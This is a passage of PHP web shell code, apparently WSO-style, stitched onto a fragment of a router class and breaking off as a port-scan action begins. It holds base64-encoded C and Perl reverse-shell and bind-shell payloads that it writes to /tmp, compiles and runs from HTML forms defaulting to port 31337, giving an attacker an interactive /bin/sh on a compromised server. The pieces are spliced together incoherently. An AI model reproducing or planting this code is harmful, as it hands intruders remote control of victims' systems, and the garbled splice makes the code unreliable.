'</div>'; }
/** * reroute to 404 **/ function route404() { include $this->arriveAtDestination(cf('router', 'destinations'), array('destination' => $this->parseDestination(cf('router', '404')))); $this->curentRoute = array('destination' => $this->parseDestination(cf('router', '404')), 'parameters' => array('ref' => '404')); exit; }
function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\n\t<span>Bind port to /bin/sh</span><br/>\n\tPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\n\t<span>Back-connect to</span><br/>\n\tServer: <input type='text' name='server' value=" . $_SERVER['REMOTE_ADDR'] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form><br>"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bpc') { cf("/tmp/bp.c", $bind_port_c); $▖ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $▖ .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl", $bind_port_p); $▖ = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST['p1'] == 'bcc') { cf("/tmp/bc.c", $back_connect_c); $▖ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $▖ .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $▖ = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo '</div>'; hardFooter(); }
p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt')); p('</p>'); formfoot(); } elseif ($action == 'bindport') { $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if (!isset($bindport) || $bindport == null) { $bindport = "31337"; } if (isset($startbind) && isset($bindport) && $bindport != null && $startbind != null) { cf("/tmp/bp.pl", $bind_port_p); $out = wsoEx("perl /tmp/bp.pl " . $bindport . " 1>/dev/null 2>&1 &"); $out2 = wsoEx("ps aux | grep bp.pl"); unlink("/tmp/bp.pl"); m("Now script binded to port " . $bindport . "..."); } formhead(array('title' => 'Bind Port')); makehide('action', 'bindport'); p('<p>'); p('Port:'); makeinput(array('name' => 'bindport', 'size' => 15, 'value' => $bindport)); makeinput(array('name' => 'startbind', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt')); p('</p>'); formfoot(); } elseif ($action == 'portscan') { !$scanip && ($scanip = '127.0.0.1');